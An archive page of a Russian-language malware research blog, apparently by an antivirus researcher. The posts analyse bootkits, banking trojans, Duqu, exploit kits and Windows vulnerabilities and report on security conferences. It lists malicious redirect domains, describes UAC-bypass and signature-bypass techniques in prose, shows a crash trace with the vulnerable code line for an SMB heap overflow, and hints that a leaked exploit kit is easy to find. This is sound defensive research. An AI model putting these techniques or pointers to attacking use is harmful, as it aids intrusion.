Fuzzing the World

Обзор книги: "The Tangled Web"

2012-02-03T20:23:00.000+04:00

Люди занимающиеся практической информационной безопасностью безусловны знакомы с исследованиями Michal Zalewski, который практически является законодателем моды, всего того, что касается безопасности современных веб-браузеров. Так вот совершенно недавно вышла за его авторством замечательная книга "The Tangled Web: A Guide to Securing Modern Web Applications".

“Thorough and comprehensive coverage from one of the foremost experts in browser security.” - Tavis Ormandy, Google Inc.

В информационной безопасности есть такие области для которых очень редко выходят стоящие книги из разряда "must read". Вот и веб-безопасность относится к таким областям, литература вроде бы есть вокруг, но стоящее чтиво в этой области большая редкость. И именно о такой стоящей книге пойдет сегодня речь ;)

Дальше »

Обновление TDL4: Purple Haze all in my brain

2012-02-02T21:38:00.000+04:00

Purple haze all in my brain
Lately things just don't seem the same
Actin' funny, but I don't know why
Jimi Hendrix

Давно я не писал про TDL4 (Win32/Olmarik.AYD) и обновления этого семейства, собственно ничего интересного там и не происходило уже несколько месяцев. Но не так давно нам попался на глаза интересный образец (отдельное спасибо за это Mila [contagiodump blog]). Немного углубившись в анализ стало понятно, что это модифицированный Olmarik, у которого поменялся дроппер и немного изменилась скрытая файловая система.

Собственно начнем с дроппера, который использует несколько интересных методик для поднятия привилегий, которые раньше нам в этом семействе не встречались. В процессе установки на Vista/Win7 для обхода UAC скачивается дистрибутив Adobe Flash Player и используется в качестве плацдарма для последующей атаки DLL hijacking. Подобная техника уже была ранее описана относительно ZeroAccess с подменой модуля msimg32.dll. Но в нашем случае подменяется ncrypt.dll.

Дальше »

MS12-004 в дикой природе

2012-01-30T20:59:00.000+04:00

В последней порции патчей от MS вышло достаточно интересное исправление MS12-004 (MIDI File Parsing Remote Buffer Overflow) для MS Media Player, которое закрывает уязвимость с возможностью удаленного исполнения кода. После прочтения бюллетеня сразу стало понятно, что это довольно действенный способ установки вредоносных программ и в ближайшем будущем этот вектор распространения может быть активно задействован. Но давайте вначале поговорим о самой уязвимости, а она, на мой взгляд, довольно интересна. Этой уязвимости подвержены все существующие ОС от MS.

Уязвимость содержится в библиотеке winmm.dll, которая реализует все необходимое для обработки MIDI файлов. Кстати сам MIDI (Musical Instrument Digital Interface) формат уходит своими корнями в далекий 1982 год. Неплохое описание самого формата есть здесь. Ключевым моментом в этой уязвимости является сам формат MIDI, а точнее две структуры MThd и MTrk, которые заполняются в памяти.

Дальше »

Carberp, Facebook и ddos.plug

2012-01-26T22:09:00.002+04:00

Про Carberp я уже писал ни раз, но тут опять граждане отличились интересной активностью. Во первых на прошлой неделе была замечена аналитиками из Trusteer интересная вещь, что с определенной конфигурацией Carberp стал вымогать деньги у зараженных Facebook пользователей за вход.

И причем очень настойчиво их требовал уплатить в размере 20 Euro через Ukash:

Были мысли, что быть может новая модификация какая, но нет только специальный конфигурационный файл содержащий инжекты для Facebook. Выглядит этот конфигурационный файл так:

Дальше »

Тенденции развития буткитов за прошлый год

2012-01-12T17:37:00.001+04:00

Прошедший 2011 год можно смело назвать годом развития сложных угроз. На протяжении всего года мы наблюдали значительный рост вредоносных программ для 64-битных платформ. Как и предполагалось в прошлом году, TDL4 (Olmarik) продолжил свое развитие, а вначале 2011 года появилась еще отдельная группа разрабатывающая семейство OImasco. Семейство OImasco, так же известное, как MaxSS и базируется на усовершенствованных/модифицированных технологиях руткитов семейства TDL и этой осенью у этой ветки появилась полноценная поддержка 64-битных систем.

Эволюцию современных буткитов можно изобразить в виде следующей схемы:

Дальше »

Arts of Bootkit

2011-12-12T23:18:00.000+04:00

Несколько недель назад на конференции MalCon'2011 была представлена любопытная работа "Windows 8 Bootkit and Art of Bootkit Development" (Peter Kleissner). В ней описывается практически все известные наработки в области создания современных буткитов и что наиболее интересно автор нашел возможность создания рабочего концепта для Win8, несмотря на все утверждения MS о новых технологиях защиты SecureBoot (UEFI-based).

Видео с демонстрацией работы концепта:

The Art of Bootkit Development [pdf]

Видимо следующем шагом в эволюции высокотехнологичных вредоносных программ станет переход к использованию технологий аппаратной визуализации в массовом порядке, а не только в редких концептах.

Обзор книги «A Bug Hunter’s Diary»

2011-12-07T21:35:00.001+04:00

Не так давно появилась в продаже англоязычная версия достаточно любопытной книги «A Bug Hunter’s Diary», изданной издательством No Starch Press.

"Give a man an exploit and you make him a hacker for a day; teach a man to exploit bugs and you make him a hacker for a lifetime." - Felix 'FX' Lindner, Head of Recurity Labs / Phenoelit

В последнее время получается так, что книги именно этого издательства чаще всего попадают на мою книжную полку (The Tangled Web, Metasploit, IDA Pro Book). Собственно, чем же меня заинтересовала эта книга, ответ достаточно прост: я давно уже искал книгу для студентов. Требования к книге были довольно просты, она должна была бы разъяснять методы эксплуатации уязвимостей не на каких-то надуманных искусственных примерах и при этом позволяла бы людям не искушенным в этом вопросе ознакомиться с предметной областью. A Bug Hunter’s Diary оказалась именно той книгой, что я искал в качестве дополнительной литературы и которую я мог бы рекомендовать моим студентам. Автор книги Tobias Klein, выстроил ее таким образом, что она постепенно переходит к более сложным темам и при этом рассматриваются уязвимости в реальных программных продуктах, которые известны многим и пользуются популярностью. Но сразу стоит сказать, что книга рассчитана на людей не искушённых с темой поиска уязвимостей и их эксплуатации, здесь вы не найдете новых методик обхода DEP/ASLR или руководство по использованию ROP.

Дальше »

Возвращение SpyEye

2011-12-06T12:38:00.001+04:00

На прошлой неделе попался на глаза интересный сэмпл SpyEye. Собственно интересен он тем, что имеет целевые плагины для российских ДБО систем.

Дальше »

Carberp + BlackHole = рост ДБО инцидентов

2011-12-05T15:42:00.001+04:00

В моем предыдущем сообщении я уже делал акцент на серьезном увлечении распространения троянской программы Carberp с легальных веб-сайтов, причем с довольно серьезной посещаемостью. В качестве эксплойтпака там всегда встречался BlackHole одной из последних версий. Например, в ноябре было замечено заражение таких ресурсов, как:

glavbukh.ru - скрытая переадресация на jya56yhsvcsss.com/BVRQ (BlackHole)
ria.ru - скрытая переадресация на aysh5tg2h3nk.com/BVRQ (BlackHole)

У этих сайтов большой объем целевой аудитории людей, которые имеют доступ к управлению финансами в различных организациях и немаленький процент из этих людей подверглись атаки и последующему заражению троянцем Carberp, который прославился своей ДБО ориентированностью.

Подводя итоги ноября мы были просто шокированы количеством предотвращенных заражений этой вредоносной программой. Помимо того, что она вошла в пятерку самых распространенных угроз по нашему региону обратите внимание на рост обнаружении в ноябре месяце:

Дальше »

Java эксплойты впереди всех по пробиву

2011-11-30T16:46:00.001+04:00

За последнее время Java-эксплойты получили наиболее широкое распространение в составе различных эксплойт-паков. Уровень пробива у них очень высок, так как обновляют JRE многие крайне редко, да и вообще забывают о его существовании. Для злоумышленников дополнительном стимолом к поиску уязвимостей в JRE является легкость их эксплуатации, стабильность, работа в обход различных песочниц внутри браузеров и кроссплатформенность.

Дальше »

ZeroNights: глазами докладчика

2011-11-28T22:44:00.001+04:00

Наконец-то нашлось время для того, чтобы как то упорядочить свои впечатления от прошедшей на днях конференции ZeroNights. Организаторам совершенно однозначно удалось достичь высокого уровня докладов и актуальности рассмотренных тем. Так как в этом году мне довелось посетить большое количество зарубежных конференций со всей ответственностью, могу заявить, что ZeroNights был на уровне. Но с точки зрения организации были конечно моменты, которые я озвучу лично оргам и которые хотелось бы избежать в будущих мероприятиях. Мне большего всего не хватало атмосферы "хакерской конференции", как это было на Ekoparty или Confidence.

Мое участие началось с доклада "Современные тенденции развития вредоносных программ для систем ДБО", в котором было рассказано о последних тенденциях и эволюции в разработке банковских троянов, заточенных под Россию. Если охарактеризовать текущую ситуацию одним слайдом, то это будет выглядеть примерно так:

Дальше »

ESET на ZeroNights

2011-11-23T21:19:00.001+04:00

Осталось всего несколько дней до основного мероприятия этой осени для исследователей в области ИБ. Мы, как компания с большим штатом ресечеров просто не могли пройти мимо и решили поддержать ZeroNights став основным спонсором мероприятия. Для нашей компании это уже сложившаяся практика поддержки практических конференций. На нашем счету уже такие мероприятия, как PHD, Confidence, Ekoparty, REcon.

В рамках программы мероприятия от нас будет два доклада:

Современные тенденции развития вредоносных программ для систем ДБО
Win32/Duqu: инволюция червя Stuxnet (FastTrack)

А еще всех участников конференции ждет новый увлекательный квест по реверсингу, с главным призом Amazon Kindle DX. Подходите к нашему стенду, регистрируйтесь и участвуйте! Правила конкурса простые, кто первый сломал того и Kindle =)

Новая модификация Carberp использует буткит-функционал

2011-11-22T14:22:00.001+04:00

Недавно нам удалось обнаружить модификацию троянца Win32/Carberp, который в процессе заражения системы устанавливает буткит-функционал. Причем, после более детального анализа выяснилось, что буткит функциональность практически полностью копирует ранее известного буткита Rovnix.

Carberp, один из самых активных троянцев встречающихся в ДБО инцидентах в этом году. Мы провели небольшое расследование по этой теме помимо буткита, нашли еще много интересного.

Подробное исследование можно найти тут:

Evolution of Win32Carberp: going deeper [EN]

Банковский троянец Carberp приобрел буткит-функционал [RU]

А, так же более расширенную версию нашего расследования можно будет услышать на конференции ZeroNights в ближайшую пятницу в рамках нашего доклада "Современные тенденции развития вредоносных программ для систем ДБО".

HACKERPRAKTIKUM в Бохуме

2011-11-14T21:50:00.001+04:00

На прошлой неделе удалось побывать на интересном мероприятии HACKERPRAKTIKUM, которое проводится уже на протяжении нескольких лет в университете RUHR города Бохум. Нас, вместе с Евгением Родионовым, пригласили выступить с докладом, который мы уже демонстрировали на Ekoparty в этом году. Мероприятие HACKERPRAKTIKUM, в рамках которого нам предложили выступить, проводится уже не первый год и призвано дать студентам практические знания от специалистов из различных областей в ИБ.

Дальше »

Win32/Duqu REsearch: что скрывает RPC

2011-11-01T14:31:00.002+04:00

Мы продолжаем исследование Win32/Duqu, в этом посте поговорим об особенностях использования RPC-протокола. Во-первых, сразу хочу отметить, что реализация RPC-протокола еще раз подтверждает сходство кода Duqu и Stuxnet. RPC-протокол, был одной из наиболее интересных частей Stuxnet. В Duqu используется, лишь часть от полного функционала этого протокола, который подробно описан в нашем исследовании "Stuxnet under the Microscope" (стр. 56-57).

Проанализировав реализацию RPC-сервера в одном из компонентов Duqu, который реализует лишь локальную часть протокола и сравнив в BinDiff две основные процедуры, мы получили интересные результаты:

Дальше »

Как определить точную дату заражения Win32/Duqu

2011-10-26T23:15:00.001+04:00

После того, как появилась первая информация о Win32/Duqu мы не могли пройти мимо, так как нам было очень интересно составить собственные впечатления об этой угрозе (да и challenge со Stuxnet напомнило). Начали копать, оказалось, что код Duqu имеет очень много общего со своим старшим братом Stuxnet. В процессе анализа складывается впечатление, что некоторые части просто полностью повторяют код из Win32/Stuxnet. Код драйверов практически идентичен, еще из наблюдений скорее всего для обоих разработок был использован какой то общий фреймворк для разработки всякого.

С того момента, как мы начали исследовать Win32/Duqu, нас интересовал вопрос, каким образом можно идентифицировать точную дату заражения компьютера этой вредоносной программой (т.к. дроппер нам до сих пор найти не удалось). Такая информация, прежде всего, полезна для проведения криминалистической экспертизы и восстановления картины произошедших событий. У нас появилась идея о том, что если Duqu хранит информацию о моменте своего самоудаления, то должна быть информация, с которой начинается этот отсчет (варианта могло быть два, либо счетчик, либо дата заражения). Нам удалось обнаружить интересную вещь, на данный момент у нас есть несколько наборов сэмплов с различных зараженных машин. И оказалось, что в процессе заражения формируется так называемая main.dll, в которой сохраняется точная дата заражения в UTC-формате. Ниже мы приводим декомпилированный код, осуществляющий проверку этой самой даты:

Дальше »

Win32/Olmasco: новый виток развития TDL4

2011-10-26T19:44:00.002+04:00

На днях в нашем англоязычном блоге мы уже писали об изменениях, произошедших за последнее время с TDL4. Для того, чтобы не было кривотолков нашего исследования, а оно уже стало сумбурно цитироваться русскоязычными СМИ, немного проясню ситуацию. Итак, во второй половине сентября нам попался интересный сэмпл TDL4 (точнее сначала мы так думали), который не смог быть обработан нашим автоматическим трекером для этого буткита. Собственно именно этот факт и привлек наше пристальное внимание к нему, при более детальном анализе оказалось, что это не Win32/Olmarik, а его модификация Win32/Olmasco (также известная, как MaxxSS). Olmasco базируется на исходных кодах TDL3/TDL4 и разрабатывается/поддерживается совсем другой группой разработчиков (это отчетливо видно по модификациям внесенным в код). Первый сэмпл попавший в семейство Win32/Olmasco в наших базах был обнаружен аж в январе этого года (обновление антивирусных баз от 2011/01/11), до этого момента мы не выделяли эти модификации в отдельное семейство. Вначале Olmasco базировался на исходных кодах TDL3, но в сентябре ситуация изменилась и появилась модификация базирующаяся на исходных кодах TDL4. Первыми, кто заметил нестандартный TDL4, была компания Microsoft. Исследователи из MS опубликовали интересную особенность нового Win32/Olmasco у себя в блоге. А точнее, новый буткит получил помимо новых возможностей дистрибуции по различным партнеркам, любопытный функционал получения резервных адресов командных центров. Эти адреса скачивались в виде изображений, которые использовались в роли стегано-контейнеров.

Дальше »

Win32/Duqu: новый виток развития истории со Stuxnet

2011-10-19T02:12:00.001+04:00

Буквально несколько часов назад компания Symantec обнародовала довольно интересный исследовательский отчет "Duqu: the precursor to the next Stuxnet". Собственно повествует он о вредоносной программе, которая своей реализацией сильно напоминает все известный Stuxnet. Причем настолько напоминает, что местами, кажется, что этот код писала одна и таже группа разработчиков. Сценарий работы очень схож со Stuxnet, но кода много и поэтому на 100% процентов для себя еще не подтвердил идентичность авторов. Из интересного вот такая вот сравнительная таблица:

Дальше »

Modern Bootkit Trends: Bypassing Kernel-Mode Signing Policy

2011-10-12T14:19:00.000+04:00

Слайды нашего доклада с VB'2011:

Это немного урезанный вариант доклада с Ekoparty, плюс добавилось несколько новых слайдов в конце, о причинах работы этого вектора атак.

Впечатления от Ekoparty

2011-10-07T19:44:00.000+04:00

В этом году конференция Ekoparty прошла уже в седьмой раз, если кто не знает эта самое главное мероприятие для латинской Америки и традиционно оно проходит в славном городе Буэнос-Айрес. Мероприятие в первую очередь направленно на исследователей в области ИБ и содержит большое количество хардкорных технических докладов.

Дальше »

Defeating x64: Modern Trends of Kernel-Mode Rootkits

2011-09-26T16:37:00.000+04:00

Слайды нашей презентации на Ekoparty:

Это было незабываемо, одна из самых ярких конференций на которых мне доводилось побывать. Чуть позже подготовлю более детальный отчет с эксклюзивными фотками =)

Ekoparty и VB2011

2011-09-17T01:26:00.000+04:00

Достаточно длительное время мы трудились над исследованием современных буткитов для x64 и прочих техник обхода проверок цифровой подписи для модулей ядра на 64-битных системах. В итоге результаты нашего исследования будут представлены сначала на Ekoparty в Буэнос-Айресе в более хардкорном техническом варианте "Defeating x64: Modern Trends of Kernel-Mode Rootkits". А после этого на VB2011 в Барселоне уже в более концептуальном виде "Modern bootkit trends: bypassing kernel-mode signing policy", адаптированном для АВ-публики :)

В задачи подготовки этих выступлений входило не просто подготовить рассказ о современных техниках загрузки не подписанных модулей ядра на 64-битных системах, а рассказать о концептуальных причинах, которые делают это возможным и почему MS не может выпустить волшебный патч. После конференций слайды обязательно положу здесь ;)

Win32/Wapomi модифицирует прошивку BIOS

2011-09-11T21:24:00.000+04:00

Началось все в начале сентября с опубликованного, китайской антивирусной компанией 360 Security, сообщения в блог о найденной вредоносной программе, которая осуществляет модификацию прошивки BIOS. Это сообщение не особо было замечено общественностью, быть может, ввиду того, что было опубликовано на китайском или из-за небольшого количества читателей самого блога. Но на прошлой неделе появилось уже сразу две публикации на английском:

Mebromi, a bios-flashing trojan (Norman)
BIOS threat is showing up again! (Symantec)

Первая мало информативна, т.к. автор в основном рассуждает о былых временах и концептах ушедших лет, разбавляя это не очень интересными картинками. А вот второй пост от Symantec более содержателен и описывает некоторые подробности работы.

Дальше »

CC'11 впечатления

2011-08-30T21:22:00.000+04:00

В выходные мне таки давилось побывать на Chaos Constructions'2011 и сразу хочу сказать, что мои опасения сбылись. В этом году фестиваль значительно уступал прошлогоднему мероприятию в плане ИБ составляющей, да и в принципе народу было меньше. Конечно, по анонсированной программе семинаров это все было итак понятно, я туда ехал скорее пообщаться с друзьями, нежели на сам фестиваль. Что касается HackQuest в этом году, то со слов организаторов, задания были упрощены, так как по опыту прошлых лет немногие с ними могли справится. Но вот удалось ли им достичь баланса между упрощением заданий и интересными квестами, сам судить я не могу, ибо не участвовал (крякми то не было никакого). Но слов некоторых участников, по сравнению с прошлом годом получилось хуже. Из позитивного в этом году был интересный конкурс от ONsec и Владимира Воронцова по обходу WAF.

Дальше »

Chaos Constructions'2011

2011-08-25T21:05:00.000+04:00

Уже традиционно в последние выходные лета в Питере проходит компьютерный фестиваль Chaos Constructions. И так же уже традиционно на этом фестивале большая часть докладов и конкурсов посвящены тематике информационной безопасности. Для себя отметил несколько докладов, которые хочу посетить:

"Lockpicking - зачем это нужно ИТ специалистам?" - Алексей Синцов

"Безопасность расширений веб-браузеров на примере Mozilla Firefox"- Тарас Иващенко

"Безопасность браузеров. Атаки на пользовательский интерфейс" - Владимир Воронцов

Так, что на этих докладах меня можно будет поймать в зале и пообщаться ;)

Техники обхода проверок цифровой подписи на x64

2011-08-24T16:30:00.000+04:00

Множится нынче количество угроз для 64-битных платформ с виндой, причем множатся не только различные троянцы, но и рукиты/буткиты в том числе. Причины очевидны, доля WinXP уверенно снижается, а предустановленных версий Win7(x64) становится все больше. В подтверждение этому факту вот такая интересная статистика за последний год:

Сейчас из наиболее интересных и активных угроз для x64 можно выделить следующие семейства:

Win64/Olmarik (MBR bootkit)
Win64/Rovnix (VBR bootkit)
Win64/TrojanDownloader.Necurs
Win64/Spy.Banker

Используемые ими подходы можно разделить на две большие группы и представить графически в виде следующей схемы:

Дальше »

Насколько защищены современные браузеры?

2011-08-12T18:02:00.003+04:00

Недавно мне попалась на глаза интересный доклад от Dino Dai Zovi "Attacker “Math” 101", в которой нашлись очень здравые схемы демонстрирующие ответ на этот вопрос. По нашей статистике, что я уже не однократно отмечал, беспрецедентное лидерство про проникновению имеют java эксплойты. А ответ почему, как раз наглядно проиллюстрирован на следующей схеме:

Собственно, что из этого следует, основная мысль в том, что реализация java платформы по прежнему не использует механизмы противодействия эксплуатации и является слабым звеном, не смотря на все новомодные "песочницы" и прочий стаф. Если из этой цепочки исключить java, то все становится значительно сложнее для злоумышленников:

А вот, что бывает после обхода "песочницы":

Проверить насколько актуальна ваша версия Java-плагина можно, к примеру, при помощи сервиса SurfPatrol от PT.

Противодействие криминалистической экспертизе со стороны вредоносных программ

2011-08-04T19:03:00.001+04:00

Вчера мы выпустили исследовательский отчет об одном интересном троянце Win32/Hodprot. Интересен он тем, что использует довольно хитрые механизмы противодействия своему обнаружению в системе. Итак, давайте обо всем по порядку ;)

Процесс заражения системы можно описать следующей схемой:

Дальше »

Practical C++ decompilation

2011-08-02T19:41:00.001+04:00

слайды презентации

Kad.dll или P2P протокол для ботнета TDL4

2011-07-04T21:36:00.002+04:00

Kad.dll (MD5: d532084641791ff3db1fbf885120e6e6 VT) это название нового пейлоада для зараженных машин руткитом TDL4, который был предназначен для инжекта в пользовательские процессы (что то вроде cmd32.dll/cmd64), в текущей версии поддерживаются только x86 системы. Появился этот компонент еще в начале года и до сих пор распространяется с кучей отладочных проверок, что наводит на мысли о его маленькой распространенности (подтверждено нашей статистикой) и видимо пока тестировании на небольших группах уже зараженных пользователей.

Библиотека kad.dll базируется на протоколе Kademilia для построения P2P. В основе этого протокола лежит распределенная таблица хешей, посредством которой создается новая абстрактная сеть в рамках которой взаимодействуют зараженные узлы. В отличие от архитектуры клиент-сервер (админка-бот), в рамках P2P сети каждый узел может выступать и в роли бота, и роли админки одновременно.

Дальше »

Наиболее распространенные эсплойт паки

2011-07-04T17:17:00.002+04:00

Попалась сегодня на глаза интересная инфографика на тему распространенных нынче связок эксплойтов:

На оригинальной картинке еще приведены ныне уже почившие, но когда то очень даже популярные наборы эксплойтов. Как показывает наша статистика во всех этих связках используются далеко не 0-day уязвимости, а вполне приличный пробив обеспечивают баяны из группы Flash/PDF/Java.

Криминалистический анализ TDL4 и TdlFsReader

2011-06-03T19:13:00.002+04:00

С сегодняшнего дня обновленный TdlFsReader (hxxp://eset.ru/tools/TdlFsReader.exe) пошел на паблик. Поддерживаются все известные модификации, как для x86, так и для x64.

Ну и чтобы закрыть вопрос с демками которые показывались на PHD и CONFidence, записано видео с отладкой кода буткита в TDL4, который, собственно, осуществляет обход проверки цифровой подписи в драйверах для x64 систем.

CONFidence'2011 (Krakow)

2011-05-26T16:07:00.002+04:00

В последнее время мне довелось побывать на большом количестве конференций в качестве докладчика, но больше всего меня поразила CONFidence'2011 в Кракове. Организаторы этой конференции очень трепетно относятся ко всем докладчикам и готовы компенсировать им все расходы за перелет, гостиницу и такси в аэропорт. Помимо этого каждый день нас водили в какой-нибудь местный ресторан для ужина, чтобы докладчики могли познакомиться и пообщаться между собой. Ко всему прочему на самой конференции для докладчиков было бесплатное пиво и прочие радости :) Вообщем по мнению большинства опрошенных мной спикеров, все они сходятся во мнении, что на CONFidence организаторы больше всего любят докладчиков и таких условий больше нет нигде. Конечно же очевидна причина такого отношения, это необходимость привлечь как можно больше интересных докладов из разных стран.

Дальше »

Впечатления от PHD

2011-05-19T22:41:00.003+04:00

Сегодня практически с самого начала я присутствовал на этом мероприятии. У входа мне удалось встретить знакомых из оргов и меня любезно провели миную огромную очередь страждущих попасть внутрь, чтобы я мог не торопясь подготовить оборудование для проведения мастер-класса "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4".

На самом деле наверное жестоко было мучить публику с утра по раньше хардкорными выкладками об внутреннем устройстве ОС и механизмах обхода проверок цифровой подписи :) Но выбора у меня не было, так как в полдень я уже должен был выдвигаться в аэропорт, но об этом расскажу позже. На удивление этот хардкор заинтересовал довольно многих и зал был наполнен целиков, включая проходы. Это крайне приятно, значит не зря было потрачено время на подготовку.

Дальше »

Завтра PHD

2011-05-18T23:40:00.003+04:00

Завтра пройдет долгожданное многими мероприятие "Positive Hack Days", программа конференции выглядит довольно многообещающе.

Завтра всех призываю участвовать в нашем конкурсе по реверсингу, начало регистрации на него собственно стартует в 9:30, т.к. задание довольно интересное и требующее времени на решение. Кто первым добудет все кодовые фразы тот и получит главный приз. А всех участников конкурса ждут сувениры от ESET ;)

Так же завтра с утра пройдет мой мастер-класс по теме "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4". Изначально он задумывался как двух часовой, но потом был урезан в связи ограничением по времени в один час по регламенту конференции. Поэтому сделать много интерактива не получится, но все равно будет интересно:

Эволюция современных руткит-программ
Этапы установки на x86/x64
Буткит и обход проверки подписи
Отладка буткита на эмуляторе Bochs
Хуки в режиме ядра
Отладка с использованием WinDbg
Файловая система TDL4
TdlFsReader, как инструмент криминалистической экспертизы

CARO'2011 in Prague

2011-05-16T21:37:00.002+04:00

В начале мая мне довелось побывать на довольно интересном мероприятии CARO 2011 Workshop. В прошлом году я уже посещал эту конференцию у финов, но на этот раз мы представляли собственный доклад "Cybercrime in Russia: Trends and Issues". Который мы готовили совместно с криминалистами из Group-IB.

Дальше »

Новая модификация TDL4 обходит костыль MS Advisory (2506014)

2011-05-05T01:13:00.001+04:00

Что собственно и следовало ожидать, в конце прошлой недели была обнаружена новая модификация TLD4 (Win32/Olmarik.AMN), которая обходит вставленный костыль от MS для противодействия используемому методу загрузки не подписанных дров (VT). Первая информация поэтому поводу появилась здесь, после чего достаточно оперативно Prevx написали неплохой блогпост по теме.

По сути произошло два важных изменения, это механизм обхода костыля от MS и изменилась функциональность связанная с хуками (неплохой блогпост от mcafee по теме), по всей видимости она была изменена для обхода существующих алгоритмов лечения.

Update: наш официальный блогпост по теме "The co-evolution of TDL4 to bypass the Windows OS Loader patch (KB2506014 )"

MS Advisory (2506014) закрывает брешь для установки на x64 винде

2011-04-13T19:57:00.002+04:00

Наконец дождались и MS стала прикрывать, мягко говоря очень не новые дыры, связанные с некоторыми методами обхода загрузки не подписанных дров для x64 винды. В частности в вышедшем вчера патче MS Advisory (2506014) были внесены изменения в загрузчик winload.exe, которые препятствуют загрузки не подписанных драйверов TDL4. В процессе инсталляции руткита все происходит, как обычно, но вот после перезапуска системы его драйвера просто не будут загружены.

Но стоит отметить, что этот путь к спасению, работает только для пользователей, которые будут подвержены заражению после этого патча. Тем, кого угораздило заразится ранее уже ничего не поможет :) Точнее TDL4 умеет блокировать доступ к серверам с обновлениями winupdate, поэтому получить заветный патч им будет нелегко.

Ну и для общности картины надо отметить, что семейство китайских буткитов, дроппер которого мы детектим, как NSIS/TrojanClicker.Agent.BJ (VT), использует иные методы обхода проверки подписи, которые этим патчем не были закрыты.

Update: Вышел наш блог пост "KB2506014 kills TDL4 on x64" в официальном блоге, с более подробным объяснением случившегося.

The Evolution of TDL: Conquering x64

2011-03-31T18:09:00.003+04:00

Вчера мы выпустили полный отчет по теме TDL4: "The Evolution of TDL: Conquering x64" [pdf]. Он характерно отличается от того, что есть на данный момент систематичностью излагаемого материала и его детализацией.

Подробно рассмотрены не только аспекты внедрения и работы самого руткита, но и пути его распространения и кто за этим стоит.

По данной теме планируется в ближайшее время два выступления, причем на CONFidence придется поехать сразу после доклада на PHD :)

Мастер-класс "Проведение криминалистической экспертизы и анализа руткит-программ на примере TDL4" на Positive Hack Days

Доклад "Defeating x64: The Evolution of the TDL Rootkit" на CONFidence'2011 Krakow

Positive Hack Days - must see!

2011-03-30T16:41:00.002+04:00

Готовится крайне интересное мероприятие и возможно у нас появится наконец хоть одна конфа с большим числом интересных докладов из которых можно извлечь для себя реальную пользу.

Ralph Langner o PLC Payload из Stuxnet

2011-03-29T19:49:00.000+04:00

Ralph Langner довольно неплохо разложил все по полочкам о PLC Payload из Stuxnet:

Безопасность SCADA все больше волнует исследователей

2011-03-23T15:56:00.002+03:00

В последнее время все больше внимания привлекается к безопасности в области промышленных SCADA систем. Отчасти катализатором такого пристального внимания стал громкий инцидент с червем Stuxnet и беспрецедентными суммами нанесенного им ущерба.

На недавно прошедшей в Мадриде конференции RootedCon'11 был представлен весьма интересный доклад "SCADA Trojans: Attacking the grid" по этой теме:

- 0-day уязвимости в Advantech/BroadWin WebAccess SCADA

- архитектурные уязвимости в CSE-Semaphore TBOX RTUs

- рассмотрены различные вектора возможных атак

[слайды] SCADA Trojans: Attacking the grid
PoC код эксплойтов

Phoenix exploit kit 2.5 leaked

2011-03-22T12:23:00.004+03:00

Собственно сабж утек на днях на паблик и стал достпен широкой общественности, ох не к добру ...

Сейчас это наверное самый распространенный и наиболее часто утекающий сплойт-пак, но видимо это следствие вытекает из первого утверждения.

Ссылку на opensc.ws уже прибили, но при умении пользоваться гуглом и небольшой смекалке все находится достаточно быстро. Как я уже писал ранее в последнее время Java стала одним из основных векторов client-side атак и здесь только подтверждается пристальное внимание и особая любовь к Java-сплойтам со стороны разработчиков.

Использование связки эксплойтов

2011-03-15T13:27:00.002+03:00

Попалось мне тут под руку достаточно наглядное видео, демонстрирующее атаку с использованием связки эсплойтов (причем достаточно свежих) для успешного пробива конечной цели. В качестве атакующего софта используется Immunity CANVAS последней версии. Еще обратите внимание на демонстрацию обхода IE sandbox, где то в середине ролика.

Владельцы ботнета TDL4 стали продавать инсталы на инфицированных машинах?

2011-03-09T16:38:00.001+03:00

Недавно было замечено, что некоторые свежие сэмплы TDL4 тащат за собой всякое (Win32/Glupteba.E, Win32/Glupteba.D). Причем ставится эта малвара без использования возможностей самого руткита по сокрытию сторонних процессов в системе. TDL4 выполняет только команду DownloadAndExecute и на этом его участие заканчивается.

Троянцы Win32/Glupteba.D, Win32/Glupteba.E, нацелены на скликивания контекстной рекламы, особенно активно проявили себя относительно рекламной сети бегуна.

Пробив через Java по прежнему лидирует

2011-02-18T17:14:00.002+03:00

По нашей статистике за последние несколько месяцев наблюдается высокий уровень концентрации среди детектов различных Java-эксплойтов. Причем не особо новых, но уровень пробива по ним очень высок (не по нашей статистике, а в принципе =)).

...
10) PDF/Exploit.Pidief.PDS.Gen 1,00%
...
18) Java/TrojanDownloader.Agent.NCA 0,73%
...
20) Java/Exploit.CVE-2010-0094.C 0,60%

Выше наша статистика по России и СНГ, дженерик на PDF немного обогнал остальных, но по миру в целом, Java лидирует. Это подтверждают и данные из админок от некоторых сплойтпаков:

MS Windows SMB "mrxsmb.sys" Remote Heap Overflow

2011-02-17T19:51:00.001+03:00

Вчера появился CVE-2011-0654 на уязвимость в переполнении кучи в процессе обработке специально подготовленных пакетов по протоколу Windows BROWSER, который работает поверх SMB. PoC несколькими днями раньше и уже произвел резонанс в определенных кругах. Виной всему функция BowserWriteErrorLogEntry() из mrxsmb.sys в которой собственно и происходит страшное:


mrxsmb!BowserWriteErrorLogEntry+0x174:
f64d815a f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

STACK_TEXT:  
f78c27b0 80825b5b 00000003 e168a000 00000000 nt!RtlpBreakWithStatusInstruction
f78c27fc 80826a4f 00000003 c070b450 8659fdb0 nt!KiBugCheckDebugBreak+0x19
f78c2b94 80826de7 00000050 e168a000 00000000 nt!KeBugCheck2+0x5d1
f78c2bb4 8085a533 00000050 e168a000 00000000 nt!KeBugCheckEx+0x1b
f78c2c28 808868d0 00000000 e168a000 00000000 nt!MmAccessFault+0xa91
f78c2c28 f64d815a 00000000 e168a000 00000000 nt!KiTrap0E+0xd8
f78c2ccc f64d8ddc 40001f5b 00000000 f78c2cfc mrxsmb!BowserWriteErrorLogEntry+0x174
f78c2d6c f649de02 85292008 8659fdb0 808a76c0 mrxsmb!HandleElectionWorker+0x2dc
f78c2d80 8087ade9 00000000 00000000 8659fdb0 mrxsmb!BowserCriticalThreadWorker+0x32
f78c2dac 809418f4 00000000 00000000 00000000 nt!ExpWorkerThread+0xeb
f78c2ddc 80887f7a 8087acfe 00000000 00000000 nt!PspSystemThreadStartup+0x2e
00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16

На самом деле все банально:

if ( Length > 0 )  
    RtlCopyMemory(StringOffset, InsertionString, Length*sizeof(WCHAR));

Vupen подтвердила работу уязвимости для Win Server 2003 SP2 и WinXP SP3, а MS утверждает, что в принципе этой уязвимости подвержены все версии винды, но ничего страшного сделать с ними нельзя кроме DoS.

Сплойт в составе Metasploit

Зевс по прежнему актуален

